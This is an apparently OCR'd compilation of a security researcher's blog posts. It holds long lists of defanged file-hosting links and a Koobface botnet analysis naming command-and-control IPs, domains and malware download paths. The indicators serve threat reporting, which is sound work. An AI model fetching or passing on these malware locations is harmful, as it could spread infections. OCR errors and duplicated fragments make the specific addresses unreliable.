hxxp://www.badongo.com/file/3 735433 
hxxp://www.badongo.com/file/3738174 
hxxp://www.files.to/get/6465/8fsOlbt711 
hxxp://www.sendspace.com/file/qg1khh 
hxxp://www.bigupload.com/d=6DD04912 
hxxp://www.share2net.com/?id=23172326 
hxxp://www.megaupload.com/?d=YBDWZPIC 
hxxp://www.send-file.com/93C7441493953704 
hxxp://www.snaggys.com/file/463/gf3-rar.htm! 
hxxp://www.megaupload.com/?d=5SDRW5C7 
hxxp://4filehosting.com/file/40040/gf3-3gp.html 
hxxp://4filehosting.com/file/40041/gf3-3gp.html 
hxxp://www.savefile.info/file/3078/gf3-3gp.html 
hxxp://www.savefile.info/file/3096/gf3-3gp.htm| 
hxxp://www.savefile.info/file/3094/gf3-3gp.htm| 
hxxp://www.savefile.info/file/3097/gf3-3gp.html 
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hxxp://www.savefile.info/file/3098/gf3-3gp.html 
hxxp://www.savefile.info/file/3095/gf3-3gp.html 
hxxp://www.afilehost.com/file/8933/gf3-3gp.html 
hxxp://www.afilehost.com/file/8934/gf3-3gp.html 
hxxp://www.afilehost.com/file/8935/gf3-3gp.html 
hxxp://www.afilehost.com/file/8936/gf3-3gp.html 
hxxp://www.afilehost.com/file/8939/gf3-3gp.html 
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The price? $20 for monthly access and $5 for weekly. Despite the fact that the service is 
attempting to monetize a commodity feature available to cybecriminals through the managed 
updates that come with the purchase of a proprietary web malware exploitation kit, it’s not a 
fad since it fills in the DIY niche where the variety of the algorithms offered and their actual 
quality will either spell the doom or the rise of the service. 


This post has been reproduced from [9]Dancho Danchev’s blog. 
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5.8.3 Movement on the Koobface Front (2009-08-04 21:10) 
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Now that the [1]Koobface gang is no longer expressing its [2]gratitude for the takedown of 
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its command and control servers, the group has put its contingency planning in action thanks 
to the on purposely slow reaction of UKSERVERS-MNT’s ([3]78.110.175.15) abuse department. 


Next to the regular updates (web.reg .md/1/[4]websrvx2.exe; web.reg.md/1/ [5]prx.exe), 
the group introduced two new domains and started taking advantage of two more IPs for its 
main command and control server. upr0306 .com now responds to: 


[6]67.215.238.178 - AS22298 - Netherlands Distinctio Ltd 

[7]78.110.175.15 - AS42831 UKSERVERS-AS UK Dedicated Servers Limited UK Dedicated 
Servers 

[8]221.5.74.46 - AS17816 - CHINA169-GZ CNCGROUP IP network China169 Guangzhou MAN 
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and that includes the two new domains introduced - pam-220709 .com; ram-220709 .com, 
with ram-220709 .com/go/?pid=30909 &type=videxpgo.php?sid=4 &sref= redirecting to the 
[9]Koobface botnet. 


Interestingly, 67.215.238.178 (hosted.by.pacificrack.com) was also used in the blackhat 
SEO campaigns from June/July, with [10]warwork .info and [11]tangoing .info parked there. 


Related posts: 

[12]Koobface - Come Out, Come Out, Wherever You Are 
[13]Dissecting Koobface Worm’s Twitter Campaign 
[14]Dissecting the Koobface Worm’s December Campaign 
[15]Dissecting the Latest Koobface Facebook Campaign 
[16]The Koobface Gang Mixing Social Engineering Vectors 


Ukrainian "fan club" and the Koobface connection: 
[17]Dissecting a Swine Flu Black SEO Campaign 
[18]Massive Blackhat SEO Campaign Serving Scareware 
[19]From Ukrainian Blackhat SEO Gang With Love 
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hxxp://d.turboupload.com/d/1935803/w2.rm.html 
hxxp://www.arbup.org/v/9507154/2 1 w2.rm.html 
hxxp://S16.quicksharing.com/v/1621501/w2.rm.html 
hxxp://www.arbup.org/v/8836297/3 2 1 w2.rm.html 
hxxp://download.file2you.net/fa74huzf6jvj/w2.rm.html 
hxxp://download.file2you.net/bcjhg9kwwofv/w2.rm.htm| 
hxxp://download.file2you.net/p8hkmvfngpr9/w2.rm.html 


hxxp://download.file2you.net/nwhhkah8rnnw/w2.rm.html 


hxxp://www.***filehost.com/?mode=viewupload &amp;id=138841 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=8508798 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=4977887 


hxxp://www.***filehost.com/?mode=viewupload &amp;id=3777279 


hxxp://www17.rapidupload.com/uploade...filepath=25361 
hxxp://www17.rapidupload.com/uploade...filepath=25366 
hxxp://fyad.org/oawn 
hxxp://www.savefile.com/files/883208 
hxxp://www.badongo.com/file/3732708 
hxxp://www.bigupload.com/d=CC86A047 
hxxp://www.share2net.com/?id=20745756 
hxxp://www.verzend.be/v/5166579/e3.rar.htm! 
hxxp://d.turboupload.com/d/1935464/e3.rar.html 
hxxp://www.filevenue.com/v/8203787/e3.rar.html 
hxxp://rapidshare.com/files/42581096/e3.rar.html 
hxxp://www.zshare.net/download/26667111fae9e4/ 
hxxp://www.4filehosting.com/file/3985 7/e3-rar.html 
hxxp://s11.quicksharing.com/v/5102707/e3.rar.html 
hxxp://www.filespoint.com/point/9240297/e3.rar.html 
hxxp://download.yousendit.com/A744DBF409DC8960 
hxxp://hyperupload.com/download/02e520bf26/e3.rar.html 
hxxp://www.bestsharing.com/files/HwS...69/e3.rar.htm| 
hxxp://www.wikiupload.com/download _page.php?id=176886 
hxxp://z11.zupload.com/download.php?...filepath=67316 
hxxp://www.reshare.co.uk/download.ph...JyF6aPjuyYMoqR 
hxxp://www.transferbigfiles.com/Get....7-58f72504ff5d 
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hxxp://depositfiles.com/files/1186811 
hxxp://depositfiles.com/files/1186823 
hxxp://depositfiles.com/files/1186798 
hxxp://depositfiles.com/files/1186821 
hxxp://depositfiles.com/files/1186810 
hxxp://www.fileflyer.com/view/3Jzo7Al 
hxxp://www.fileflyer.com/view/r3H1eAL 
hxxp://www.fileflyer.com/view/AfX8NCP 
hxxp://www.sendspace.com/file/vrpap1 
hxxp://www.megaupload.com/?d=HZ7CLHI1 
hxxp://www.megaupload.com/?d=NZLEKILM 
hxxp://www.megaupload.com/?d=K42L4QTO 
hxxp://www.megaupload.com/?d=98GJGDX1 
hxxp://www.megaupload.com/?d=VZVUQ9LR 
hxxp://www.megaupload.com/?d=3S5CFYS4 
hxxp://www.megaupload.com/?d=37G100DW 
hxxp://www.megaupload.com/?d=7BQHD61B 
hxxp://S16.quicksharing.com/v/112536/DS.avi.html 
hxxp://s16.quicksharing.com/v/3056205/DS.avi.html 
hxxp://s16.quicksharing.com/v/1534446/DS.avi.html 
hxxp://www.fileblob.com/download.php?id=F673E92D 
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hxxp://download.file2you.net/aznkhacdgn39/DS.avi.html 
hxxp://download.file2you.net/uwfbe4ajwwh9/DS.avi.html 
hxxp://www.megafileupload.com/en/file/4765/DS-avi.html 
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hxxp://www.megaupload.com/?d=C2UY3D0H 
hxxp://www.megaupload.com/?d=TOG9UAH8 
hxxp://www.megaupload.com/?d=58Y3ENQW 
hxxp://www.megaupload.com/?d=O50H8DRM 
hxxp://shareoutpost.com/file/261/DS2.rmvb.html 
hxxp://shareoutpost.com/file/263/DS2.rmvb.html 
hxxp://shareoutpost.com/file/264/DS2.rmvb.html 
hxxp://www.savefile.info/file/3031/DS2-rmvb.html 
hxxp://www.savefile.info/file/3033/DS2-rmvb.html 
hxxp://4filehosting.com/file/38240/DS2-rmvb.html 
hxxp://4filehosting.com/file/38251/DS2-rmvb.html 
hxxp://getupload.com/en/file/7895/DS2-rmvb.html 
hxxp://getupload.com/en/file/7894/DS2-rmvb.html 
hxxp://rapidshare.com/files/42118007/DS2.rmvb.html 
hxxp://rapidshare.com/files/42118101/DS2.rmvb.html 
hxxp://rapidshare.com/files/42118152/DS2.rmvb.html 
hxxp://rapidshare.com/files/42118375/DS2.rmvb.html 
hxxp://rapidshare.com/files/42118449/DS2.rmvb.html 
hxxp://rapidshare.com/files/42118437/DS2.rmvb.html 
hxxp://rapidshare.com/files/42119522/DS2.rmvb.html 
hxxp://rapidshare.com/files/42119677/DS2.rmvb.html 
hxxp://rapidshare.com/files/42119608/DS2.rmvb.html 
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hxxp://www. maxishare.net/en/file/1297/DS2-rmvb.html 
hxxp://www.fileblob.com/download.php?id=D4DD1725 
hxxp://www.4filehosting.com/file/38287/DS2-rmvb.html 
hxxp://www.4filehosting.com/file/38295/DS2-rmvb.html 
hxxp://www.4filehosting.com/file/38296/DS2-rmvb.html 
hxxp://uploadpalace.com/en/download.php?id=2967C7871 
hxxp://uploadpalace.com/en/download.php?id=EB5E47671 
hxxp://youploadit.ipresentyou.com/download.php?id=4575E703 
hxxp://youploadit.ipresentyou.com/download.php?id=68E6F3C4 
hxxp://youploadit.ipresentyou.com/download.php?id=9CA6FO8F 
hxxp://youploadit.ipresentyou.com/download.php?id=FC55D801 
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hxxp://depositfiles.com/files/1186754 
hxxp://depositfiles.com/files/1186752 
hxxp://depositfiles.com/files/1186756 
hxxp://www.sendspace.com/file/mmij5w 
hxxp://www.megaupload.com/?d=l081S41Q 
hxxp://www.megaupload.com/?d=J473289V 
hxxp://www.megaupload.com/?d=IJVOGJDD 
hxxp://www.megaupload.com/?d=O79N2TU3 
hxxp://www.megaupload.com/?d=YQW10XE1 
hxxp://shareoutpost.com/file/259/DS3.rm.html 
hxxp://shareoutpost.com/file/260/DS3.rm.html 
hxxp://www.megaupload.com/?d=NANUQG8M 
hxxp://getupload.com/en/file/7892/DS3-rm.html 
hxxp://4filehosting.com/file/38182/DS3-rm.html 
hxxp://4filehosting.com/file/38184/DS3-rm.html 
hxxp://www.savefile.info/file/3027/DS3-rm.htm| 
hxxp://www.afilehost.com/file/8773/DS3-rm.html 
hxxp://primeupload.com/file/126005/DS3.rm.html 
hxxp://primeupload.com/file/126022/DS3.rm.html 


hxxp://primeupload.com/file/126024/DS3.rm.html 
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hxxp://primeupload.com/file/126026/DS3.rm.htm| 
hxxp://primeupload.com/file/126027/DS3.rm.htm| 
hxxp://www.zshare.net/download/263167889fb109/ 
hxxp://rapidshare.com/files/42114183/DS3.rm.html 
hxxp://rapidshare.com/files/42114151/DS3.rm.html 
hxxp://rapidshare.com/files/42114074/DS3.rm.html 
hxxp://rapidshare.com/files/42114039/DS3.rm.html 
hxxp://rapidshare.com/files/42113302/DS3.rm.html 
hxxp://rapidshare.com/files/42115598/DS3.rm.html 
hxxp://www.maxishare.net/en/file/1298/DS3-rm.html 
hxxp://www.maxishare.net/en/file/1300/DS3-rm.html 
hxxp://www.maxishare.net/en/file/1301/DS3-rm.html 
hxxp://www.maxishare.net/en/file/1299/DS3-rm.html 
hxxp://www.4filehosting.com/file/38300/DS3-rm.html 
hxxp://www.4filehosting.com/file/38301/DS3-rm.html 
hxxp://www.4filehosting.com/file/38302/DS3-rm.html 
hxxp://www.4filehosting.com/file/38303/DS3-rm.html 
hxxp://www.upitus.com/download.php?file=254d0330 
hxxp://www.megafileupload.com/en/file/4767/DS3-rm.html 
hxxp://uploadpalace.com/en/download.php?id=DECEB9D01 
hxxp://youploadit.ipresentyou.com/download.php?id=52A02D30 
hxxp://youploadit.ipresentyou.com/download.php?id=49731272 
hxxp://youploadit.ipresentyou.com/download.php?id=O0AF2732B 
hxxp://youploadit.ipresentyou.com/download.php?id=C3D55287 
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hxxp://www.share2net.com/?id=69922888 
hxxp://www.megaupload.com/?d=110KME4) 
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hxxp://www.verzend.be/v/6354408/G24.rar.html 
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hxxp://www.savefile.info/file/3028/G24-3gp.html 
hxxp://getupload.com/en/file/7893/G24-3gp.html 
hxxp://4filehosting.com/file/38188/G24-3gp.html 
hxxp://4filehosting.com/file/38187/G24-3gp.html 
hxxp://www. yourfilelink.com/get.php?fid=355521 
hxxp://www.afilehost.com/file/8774/G24-3gp.html 
hxxp://primeupload.com/file/126006/G24.3gp.html 
hxxp://primeupload.com/file/126032/G24.3gp.html 
hxxp://primeupload.com/file/126030/G24.3gp.html 
hxxp://primeupload.com/file/126031/G24.3gp.html 
hxxp://primeupload.com/file/126028/G24.3gp.html 
hxxp://primeupload.com/file/126029/G24.3gp.html 
hxxp://www.zshare.net/download/26317281fb5ff2/ 
hxxp://www.filevenue.com/v/8009049/G24.rar.html 
hxxp://rapidshare.com/files/42128898/G24.rar.html 
hxxp://www.zshare.net/download/26327890ac4372/ 
hxxp://rapidshare.com/files/42113349/G24.3gp.html 
hxxp://rapidshare.com/files/42116268/G24.3gp.html 
hxxp://www.4filehosting.com/file/38259/G24-rar.html 
hxxp://S11.quicksharing.com/v/4136703/G24.rar.htm| 
hxxp://www.maxishare.net/en/file/1303/G24-3gp.html 
hxxp://www.maxishare.net/en/file/1305/G24-3gp.html 
hxxp://www.maxishare.net/en/file/1304/G24-3gp.html 
hxxp://www.maxishare.net/en/file/1302/G24-3gp.html 
hxxp://www.4filehosting.com/file/38304/G24-3gp.html 
hxxp://www.4filehosting.com/file/38305/G24-3gp.html 
hxxp://www.4filehosting.com/file/38306/G24-3gp.html 
hxxp://www.4filehosting.com/file/38307/G24-3gp.html 
hxxp://download.yousendit.com/3C2FA1D93AF398F7 
hxxp://www.upitus.com/download.php?file=70b57664 
hxxp://www.fileblob.com/download.php?id=6F581D5B 
hxxp://www.keepmyfile.com/download/e8b3241725189 
hxxp://storeandserve.com/download/815215/G24.rar.html 
hxxp://www.megafileupload.com/en/file/4768/G24-3gp.html 
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hxxp://www.bestsharing.com/files/Dkhb9302223/G24.rar.html 
hxxp://www.viprasys.com/host/download.php?file=274G24.3gp 
hxxp://youploadit.ipresentyou.com/download.php?id=64E510D3 
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hxxp://www.upload.pk/freeupload/download.php?file=3028f5aee25fa81la 8eea7a54e1f84a66 
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hxxp://www.badongo.com/file/3 769478 
hxxp://www.sendspace.com/file/k27sqd 
hxxp://www.fileflyer.com/view/QZFgOBw 
hxxp://ultrashare.net/hosting/fl/6535803cf6 
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hxxp://www.fileblob.com/download.php?id=75F648ED 
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Now that the [1]Koobface gang is no longer expressing its [2]gratitude for the takedown of its 
command and control servers, the group has put its contingency planning in action thanks to 
the on purposely slow reaction of UKSERVERS-MNT’s ([3]78.110.175.15) abuse department. 


Next to the regular updates (web.reg .md/1/[4]websrvx2.exe; web.reg.md/1/ [5]prx.exe), 
the group introduced two new domains and started taking advantage of two more IPs for its 
main command and control server. upr0306 .com now responds to: 


[6]67.215.238.178 - AS22298 - Netherlands Distinctio Ltd 


[7178.110.175.15 - AS42831 UKSERVERS-AS UK Dedicated Servers Limited UK Dedicated 
Servers 


[8]221.5.74.46 - AS17816 - CHINA169-GZ CNCGROUP IP network Chinal69 Guangzhou 
MAN 
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hxxp://rapidshare.com/files/43280896...7f983.rar.html 
hxxp://rapidshare.com/files/43281408...7f983.rar.htm| 
hxxp://uploadpalace.com/en/file/7941...7f983-rar.html 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=9050006 
24813 


hxxp://www.***filehost.com/?mode=viewupload &amp;id=2281740 
hxxp://www17.rapidupload.com/uploade...filepath=26159 
hxxp://s16.quicksharing.com/v/362991...7f983.rar.html 
hxxp://download.file2you.net/ezcdwwu...7f983.rar.html 
hxxp://www.upload.pk/freeupload/down...df76b3a447a964 
hxxp://www.mercuryupload.com/media/d...df76b3a447a964 
hxxp://depositfiles.com/files/1232405 
hxxp://www.badongo.com/file/3 769610 
hxxp://www.sendspace.com/file/s3rn1f 
hxxp://www.fileflyer.com/view/rsTrRBD 
hxxp://ultrashare.net/hosting/fl/05f9423c81 
hxxp://www.megaupload.com/?d=N885CRFT 
hxxp://www.megaupload.com/?d=TM9OHEXU 
hxxp://www.megaupload.com/?d=RWOPMX9C 
hxxp://www.zshare.net/download/2717032de7293c/ 
hxxp://www.upitus.com/download.php?file=f2938ab5 
hxxp://www.arbup.org/v/2817570/8f4d375eea.rar.html 
hxxp://www.savefile.info/file/3178/8f4d375eea-rar.html 
hxxp://4filehosting.com/file/42286/8f4d375eea-rar.html 
hxxp://4filehosting.com/file/42287/8f4d375eea-rar.html 
hxxp://www.afilehost.com/file/9173/8f4d375eea-rar.html 
hxxp://primeupload.com/file/126957/8f4d375eea.rar.html 
hxxp://www.fileblob.com/download.php?id=CACOFBEC 
hxxp://d.turboupload.com/d/1944083/8f4d375eea.rar.html 
hxxp://uploadpalace.com/en/file/7942...75eea-rar.html 
hxxp://rapidshare.com/files/43281641...75eea.rar.html 
hxxp://rapidshare.com/files/43281742...75eea.rar.html 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=1687231 
hxxp://www17.rapidupload.com/uploade...filepath=26160 
hxxp://S16.quicksharing.com/v/534612...75eea.rar.html 
hxxp://download.file2you.net/7y2urpu...75eea.rar.html 
hxxp://www.upload.pk/freeupload/down...b55d0a428bde90 
hxxp://www.mercuryupload.com/media/d...655d0a428bde90 
hxxp://depositfiles.com/files/1232427 
hxxp://www.badongo.com/file/3 769650 
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hxxp://www.sendspace.com/file/nsa9x4 
hxxp://www.fileflyer.com/view/P9QBSAX 
hxxp://ultrashare.net/hosting/fl/eb1d7447c0 
hxxp://www.megaupload.com/?d=Q6MVDI3W 
hxxp://www.megaupload.com/?d=1UK4DO009 
hxxp://www.megaupload.com/?d=XR23QKUG 
hxxp://www.zshare.net/download/2717079682fe74/ 
hxxp://www.upitus.com/download.php?file=306eb983 
hxxp://www.fileblob.com/download.php?id=B34B6FF8 
hxxp://www.arbup.org/v/6288966/16bda6ed31.3gp.html 
hxxp://4filehosting.com/file/42294/16bda6ed31-3gp.html 
hxxp://4filehosting.com/file/42295/16bda6ed31-3gp.html 
hxxp://www.savefile.info/file/3179/16bda6ed31-3gp.html 
hxxp://www.afilehost.com/file/9174/16bda6ed31-3gp.html 
hxxp://primeupload.com/file/126958/16bda6ed31.3gp.html 
hxxp://d.turboupload.com/d/1944146/16bda6ed31.3gp.html 
hxxp://rapidshare.com/files/43282325...6ed31.3gp.html 
hxxp://rapidshare.com/files/43282178...6ed31.3gp.html 
hxxp://uploadpalace.com/en/file/7943...6ed31-3gp.html 
hxxp://www17.rapidupload.com/uploade...filepath=26161 
hxxp://s16.quicksharing.com/v/123118...6ed31.3gp.html 
hxxp://download.file2you.net/fxgjw26...6ed31.3gp.html 
hxxp://www.viprasys.com/host/downloa...16bda6ed31.3gp 
hxxp://www.upload.pk/freeupload/down...e5b8319f391a06 
hxxp://fyad.org/nykz 

hxxp://orb-z.com/GG9u 
hxxp://depositfiles.com/files/1084619 
hxxp://depositfiles.com/files/1082866 
hxxp://depositfiles.com/files/1082903 
hxxp://www.fileflyer.com/view/ad5pIC9 
hxxp://www.fileflyer.com/view/Z]GAdAY 
hxxp://www.megaupload.com/?d=TI5EXYOY 
hxxp://www.megaupload.com/?d=MRJH53VW 
hxxp://www.megaupload.com/?d=24VR60MX 
hxxp://www.megaupload.com/?d=BWXD8840 
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hxxp://www.megaupload.com/?d=8S6QMBOY 
hxxp://www.megaupload.com/?d=BWHFDTON 
hxxp://supasic.com/download.php?file=489062 
hxxp://supasic.com/download.php?file=631319 
hxxp://s16.quicksharing.com/v/259798/11.avi.html 
hxxp://s16.quicksharing.com/v/2050983/11.avi.html 
hxxp://upload.vinacis.com/host/E99B967A/11.avi.html 
hxxp://upload.vinacis.com/host/F91EA9FO/11.avi.html 
hxxp://upload.vinacis.com/host/74C63A19/11.avi.html 
hxxp://upload.vinacis.com/host/9DC39316/11.avi.html 
hxxp://upload.vinacis.com/host/F089705B/11.avi.html 
hxxp://filehostia.com/show.php?img=2611 _11.avi.html 
hxxp://filehostia.com/show.php?img=2610 _11.avi.html 
hxxp://filehostia.com/show.php?img=2612 _11.avi.html 
hxxp://download.file2you.net/jcyw82k6uprb/11.avi.htm! 
hxxp://download.file2you.net/2bhe3thwttzm/11.avi.htm! 
hxxp://download.file2you.net/uwu4vyupffwh/11.avi.html 
hxxp://www.megafileupload.com/en/file/3184/11-avi.html 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=657264 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=2967231 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=5824031 
hxxp://www17.rapidupload.com/uploade...filepath=23130 
hxxp://www.useboost.com/367fc5436575...370/1lavi.html 
hxxp://www.useboost.com/56cf1128c3ff...9dc/1lavi.html 
hxxp://www.useboost.com/4abecda5d60e...279/11lavi.html 
hxxp://www.useboost.com/c9b3c2c2b809...329/1lavi.html 
hxxp://www.useboost.com/4025e13ec76b...2ac/1lavi.html 
hxxp://www.useboost.com/8a7318f57e76...dc1/1lavi.html 
hxxp://www.mercuryupload.com/media/d...11b3c5ceb6e31a 
hxxp://fyad.org/nymq 
hxxp://up.spbland.ru/files/070624493/ 
hxxp://up.spbland.ru/files/070624401/ 
hxxp://depositfiles.com/files/1085137 
hxxp://depositfiles.com/files/1084618 
hxxp://www.megaupload.com/?d=Z616T50Q 

24816 


hxxp://www.savefile.info/file/2719/22-rm.html 
hxxp://4filehosting.com/file/26834/22-rm.html 
hxxp://4filehosting.com/file/26908/22-rm.html 
hxxp://www.savefile.info/file/2686/22-rm.html 
hxxp://www.savefile.info/file/2688/22-rm.html 
hxxp://www.savefile.info/file/2687/22-rm.html 
hxxp://www.savefile.info/file/2689/22-rm.html 
hxxp://www.savefile.info/file/2690/22-rm.html 
hxxp://getupload.com/en/file/7669/22-rm.html 
hxxp://getupload.com/en/file/7677/22-rm.html 
hxxp://4filehosting.com/file/2 7007/22-rm.html 
hxxp://www.afilehost.com/file/8126/22-rm.html 
hxxp://www.afilehost.com/file/8134/22-rm.html 
hxxp://www.megaupload.com/?d=UAPCVTWD 
hxxp://primeupload.com/file/124068/22.rm.html 
hxxp://primeupload.com/file/124022/22.rm.htm| 
hxxp://www.maxishare.net/en/file/1055/22-rm.html 
hxxp://www.maxishare.net/en/file/1056/22-rm.html 
hxxp://www.upitus.com/download.php?file=aadbe 
hxxp://www.getupload.com/en/file/7663/22-rm.html 
hxxp://www.getupload.com/en/file/7664/22-rm.html 
hxxp://www.4filehosting.com/file/26878/22-rm.html 
hxxp://www.4filehosting.com/file/26880/22-rm.html 
hxxp://www.4filehosting.com/file/26884/22-rm.html 
hxxp://www.4filehosting.com/file/26886/22-rm.html 
hxxp://www.4filehosting.com/file/26887/22-rm.html 
hxxp://www.upitus.com/download.php?file=2d3b6ff0 
hxxp://upload.vinacis.com/host/C100AF30/22.rm.html 
hxxp://upload.vinacis.com/host/B2F14736/22.rm.htm| 
hxxp://upload.vinacis.com/host/784B3858/22.rm.html 
hxxp://rapidshare.com/files/39086376/x 0 22.rm.html 
hxxp://rapidshare.com/files/39103816/x 0 _22.rm.html 
hxxp://www.upitus.com/download.php?file=e6b48e9f 
hxxp://upload.vinacis.com/host/AC9245C6/22.rm.html 
hxxp://www.uupload.net/download.php?id=12672D65 
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hxxp://upload.vinacis.com/host/BB8482FB/22.rm.htm| 
hxxp://www.upitus.com/download.php?file=9e56bdd2 
hxxp://www.uupload.net/download.php?id=849EDA7B 
hxxp://www.megafileupload.com/en/file/3248/22-rm.html 


hxxp://www.megafileupload.com/en/file/3250/22-rm.html 


hxxp://www.megafileupload.com/en/file/3249/22-rm.html 


hxxp://www.megafileupload.com/en/file/3251/22-rm.html 


hxxp://www.megafileupload.com/en/file/3252/22-rm.html 


hxxp://www.megafileupload.com/en/file/32 79/22-rm.html 


hxxp://www.shipmyfile.com/download.php?id=F7716AF8 


hxxp://www.shipmyfile.com/download.php?id=7D59EF5B 


hxxp://uploadpalace.com/en/download.php?id=F027B8721 


hxxp://www. miniuploads.com/download.php?id=31CEA5B5 


hxxp://www. miniuploads.com/download.php?id=F85191EE 


hxxp://www. miniuploads.com/download.php?id=F1CODD16 


hxxp://uploadpalace.com/en/download.php?id=EBD2CBBO1 


hxxp://youploadit.ipresentyou.com/do...hp?id=2676680A 


hxxp://www.uploadpalace.com/en/downl.. 
hxxp://www.uploadpalace.com/en/downl... 
hxxp://www.uploadpalace.com/en/downl.. 


hxxp://www.uploadpalace.com/en/downl... 


.p?id=928931091 


p?id=D48A05471 


.p?id=7F3209631 


p?id=99F9F3801 


hxxp://www.upload.pk/freeupload/down...0309f0f5abe621 


hxxp://fyad.org/nymr 


hxxp://www.savefile.info/file/2695/33-rm.html 
hxxp://www.savefile.info/file/2692/33-rm.html 
hxxp://www.savefile.info/file/2693/33-rm.html 
hxxp://www.savefile.info/file/2694/33-rm.html 
hxxp://www.savefile.info/file/2691/33-rm.html 
hxxp://www.verzend.be/v/8238862/33.rar.html 
hxxp://primeupload.com/file/124019/33.rm.html 
hxxp://rapidshare.com/files/39083556/33.rar.html 


hxxp://www.maxishare.net/en/file/1061/33-rm.html 


hxxp://www.maxishare.net/en/file/1062/33-rm.html 


hxxp://www.getupload.com/en/file/7665/33-rm.html 


hxxp://www.getupload.com/en/file/7666/33-rm.html 
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hxxp://www.4filehosting.com/file/26889/33-rm.html 
hxxp://www.4filehosting.com/file/26893/33-rm.html 
hxxp://www.4filehosting.com/file/26896/33-rm.html 
hxxp://www.4filehosting.com/file/26899/33-rm.html 
hxxp://www.4filehosting.com/file/26901/33-rm.html 
hxxp://s11.quicksharing.com/v/9427271/33.rar.html 
hxxp://www.filespoint.com/point/7364664/33.rar.html 
hxxp://www.upitus.com/download.php?file=5blaf13c 
hxxp://www.upitus.com/download.php?file=3961le8dd 
hxxp://www.upitus.com/download.php?file=9cd1e893 
hxxp://www.upitus.com/download.php?file=7297ec80 
hxxp://www.uupload.net/download.php?id=A82C51EF 
hxxp://www.uupload.net/download.php?id=DFAFCD62 
hxxp://www.megafileupload.com/en/file/3258/33-rm.htm| 
hxxp://www.megafileupload.com/en/file/3253/33-rm.htm| 
hxxp://www.megafileupload.com/en/file/3256/33-rm.html 
hxxp://www.megafileupload.com/en/file/3255/33-rm.html 
hxxp://www.megafileupload.com/en/file/325 7/33-rm.htm| 
hxxp://www.shipmyfile.com/download.php?id=08139D32 
hxxp://www.shipmyfile.com/download.php?id=760D79BA 
hxxp://www.miniuploads.com/download.php?id=C789C3D8 
hxxp://www.miniuploads.com/download.php?id=89B37A3C 
hxxp://www.miniuploads.com/download.php?id=B38D29B2 
hxxp://www.miniuploads.com/download.php?id=6699AB8C 
hxxp://www.miniuploads.com/download.php?id=449DC8DD 
hxxp://www.uploadpalace.com/en/downl...p?id=A2AB62391 
hxxp://www.uploadpalace.com/en/downl...p?id=F3840AD71 
hxxp://youploadit.ipresentyou.com/do...hp?id=BEB6C392 
hxxp://youploadit.ipresentyou.com/do...hp?id=3C61C51F 
hxxp://www.uploadpalace.com/en/downl...p?id=68ADA1CA1 
hxxp://www.uploadpalace.com/en/downl...p?id=D1D7CAAB1 
hxxp://fyad.org/nyh6 

hxxp://up.spbland.ru/files/070624315/ 
hxxp://depositfiles.com/files/1083345 
hxxp://depositfiles.com/files/1083244 
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hxxp://depositfiles.com/files/1083304 
hxxp://depositfiles.com/files/1080599 
hxxp://www.badongo.com/file/3531060 
hxxp://www.sendspace.com/file/68vOfh 
hxxp://www.megaupload.com/?d=ZUF7DJ52 
hxxp://www.megaupload.com/?d=3G26WF70 
hxxp://www.megaupload.com/?d=TL3R7BUU 
hxxp://www.megaupload.com/?d=BVVT8QKA 
hxxp://getupload.com/en/file/7636/44-3gp.html 
hxxp://4filehosting.com/file/26547/44-3gp.html 
hxxp://4filehosting.com/file/26548/44-3gp.html 
hxxp://www.savefile.info/file/2668/44-3gp.html 
hxxp://www.savefile.info/file/2700/44-3gp.html 
hxxp://www.savefile.info/file/2699/44-3gp.html 
hxxp://www.savefile.info/file/2698/44-3gp.html 
hxxp://www.savefile.info/file/2697/44-3gp.html 
hxxp://www.savefile.info/file/2696/44-3gp.html 
hxxp://www.afilehost.com/file/8067/44-3gp.html 
hxxp://primeupload.com/file/123972/44.3gp.html 
hxxp://primeupload.com/file/124021/44.3gp.html 
hxxp://rapidshare.com/files/38982161/44.3gp.html 
hxxp://www.zshare.net/download/24033806803624/ 
hxxp://www.4filehosting.com/file/26904/44-3gp.html 
hxxp://www.4filehosting.com/file/26905/44-3gp.html 
hxxp://www.4filehosting.com/file/26919/44-3gp.html 
hxxp://www.4filehosting.com/file/26921/44-3gp.html 
hxxp://download.yousendit.com/86DE0356530CEBAE 
hxxp://www.upitus.com/download.php?file=9174d429 
hxxp://www.upitus.com/download.php?file=4bd9807c 
hxxp://www.upitus.com/download.php?file=cab57558 
hxxp://www.upitus.com/download.php?file=819e422b 
hxxp://www.upitus.com/download.php?file=b7eede9f 
hxxp://www.upitus.com/download.php?file=8c260744 
hxxp://www.upitus.com/download.php?file=4bdb1893 
hxxp://www.upitus.com/download.php?file=4cd32951 
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hxxp://www.upitus.com/download.php?file=65d6a89c 
hxxp://rapidshare.com/files/39042761/x 0 44.3gp.html 
hxxp://rapidshare.com/files/39041767/x 0 44.3gp.html 
hxxp://rapidshare.com/files/39043403/x 0 44.3gp.html 
hxxp://www.archive.org/download/rb3i-ibn-3amr/44.3gp 
hxxp://www.megafileupload.com/en/file/3183/44-3gp.html 
hxxp://www.megafileupload.com/en/file/3259/44-3gp.html 
hxxp://www.megafileupload.com/en/file/3260/44-3gp.html 
hxxp://www.megafileupload.com/en/file/3261/44-3gp.html 
hxxp://www.megafileupload.com/en/file/3262/44-3gp.html 
hxxp://www.megafileupload.com/en/file/3263/44-3gp.html 
hxxp://www.miniuploads.com/download.php?id=5E6A34F2 
hxxp://www.miniuploads.com/download.php?id=64354515 
hxxp://www.miniuploads.com/download.php?id=929439B9 
hxxp://www.miniuploads.com/download.php?id=B69935D9 
hxxp://www.miniuploads.com/download.php?id=E9A10DFE 
hxxp://uploadpalace.com/en/download.php?id=B2422AAD1 
hxxp://www.miniuploads.com/download.php?id=3E46CB2B 
hxxp://www.viprasys.com/host/downloa...file=88544.3gp 
hxxp://www.uploadpalace.com/en/downl...p?id=FD1786691 
hxxp://www.uploadpalace.com/en/downl...p?id=36070AEC1 
hxxp://www.uploadpalace.com/en/downl...p?id=BD6A92711 
hxxp://www.uploadpalace.com/en/downl...p?id=DEC3CFFC1 
hxxp://www.upload.pk/freeupload/down...bf45790778d02d 
hxxp://supasic.com/download.php?file=125935 


hxxp://www.mercuryupload.com/media/download.php?file=6517202bd2266fe65376al 
dbf5aa3e4e 


